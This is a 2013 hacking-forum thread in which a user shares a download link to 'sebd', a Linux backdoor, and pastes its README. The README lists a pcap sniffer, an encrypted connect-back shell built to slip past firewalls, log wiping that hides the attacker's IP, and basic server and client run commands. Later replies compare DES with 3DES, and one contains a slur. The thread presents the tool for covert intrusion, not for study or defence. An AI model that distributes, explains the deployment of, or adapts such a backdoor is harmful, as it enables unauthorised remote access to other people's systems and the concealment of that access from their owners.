Leak SEBD - Simple Encrypted Backdoor for Linux

Reiko · 10-01-2013, 04:44 AM

http://mybb.rsadvance.net/sebd-0.2-new.tgz

I found this on an excursion to the land of EFnet and decided I'd share it.
This is an interesting little backdoor for Linux and other Unix-like OSes and I'll be writing a tutorial on how to use it soon. Watch this space. Should be up by tomorrow.
Until then, have a c/p from the README file.

Quote:[23:48:24] Oni | SL: So I could set it to 80 on box running apache/nginx?
[23:48:36] Oni | SL: on a*
[23:48:40] Starfall: it "listens on all ports" using a pcap-based sniffer
[23:48:47] Starfall: the SERVER_PORT is the port you're receiving the back connect shell on
[23:48:49] Oni | SL: Ah.

Instructions for compiling: ./configure;make
Configure script does all the editing config.h for you, I removed that bit after realizing that.

slider Wrote:sebd v0.1 (simple encrypted backdoor)

sebd is another linux backdoor.

what does sebd provide:
- a raw sniffer
- aes encrypted shell
- full tty/pty support
- connect back (bypass moust of the firewall's)
- does not open a port
- you can log in on any opened port
- cleans the logs (wipes out the ip from where the sniffer received the password)
- tcpd function (if the pasword is from an ip that isn't in the list -> no shell)
- password is encrypted with DES (hardcoded only in the server binary)

usage:

on the server host run: ./sebd
on the client host run: ./client -h host|ip -d port

AUTHOR: slider
EMAIL: slider@go.ro

PS: check out the CREDITS...it's only a hack

Cyanide and Cynicism · 10-01-2013, 05:47 AM

Quote:- password is encrypted with DES (hardcoded only in the server binary)

fgt use 3des

Dismas · 10-01-2013, 10:44 AM

(10-01-2013, 05:47 AM)Cyanide and Cynicism Wrote: fgt use 3des

For those that are too lazy to Google, DES is an older form of encryption (with a small key size). 3DES is similar, but instead involves combining 3 instances of DES.

3DES > DES

Read More: http://www.cs.wustl.edu/~jain/cse567-06/...x.html#2_5